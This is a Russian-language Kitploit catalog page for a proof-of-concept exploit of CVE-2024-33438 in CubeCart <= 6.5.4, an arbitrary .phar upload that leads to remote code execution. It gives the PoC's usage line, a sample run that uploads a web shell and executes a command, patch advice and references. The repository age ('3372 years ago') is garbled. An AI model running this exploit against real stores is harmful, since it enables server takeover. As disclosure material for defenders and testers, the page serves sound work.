Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 уязвим для произвольной загрузки файлов, что приводит к удалённому выполнению кода (RCE). | Kitploit
Инструменты/GitHubGitHub/julio-cfa/cve-2024-33438
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 уязвим для произвольной загрузки файлов, что приводит к удалённому выполнению кода (RCE).

Репозиторий
3372 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Произвольная загрузка файлов ведёт к RCE (CVE-2024-33438)

CubeCart <= 6.5.4 уязвим к проблеме произвольной загрузки файлов, которая приводит к удалённому выполнению кода (RCE). Уязвимость затрагивает файловый менеджер приложения и его фильтры, позволяя злоумышленникам загружать файлы .phar, содержащие вредоносный код. CubeCart следует обновить до версии 6.5.5, поскольку в ней реализован патч безопасности, устраняющий эту уязвимость.

Более подробную информацию см. в официальном объявлении CubeCart в разделе ссылок.

Эксплуатация

Был создан автоматизированный proof-of-concept (PoC), но данную уязвимость также можно эксплуатировать вручную, загрузив вредоносный файл .phar через файловый менеджер.

Использование PoC:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

После запуска ожидаемый вывод при успешной эксплуатации выглядит так:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

Ссылки

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
Скачать инструмент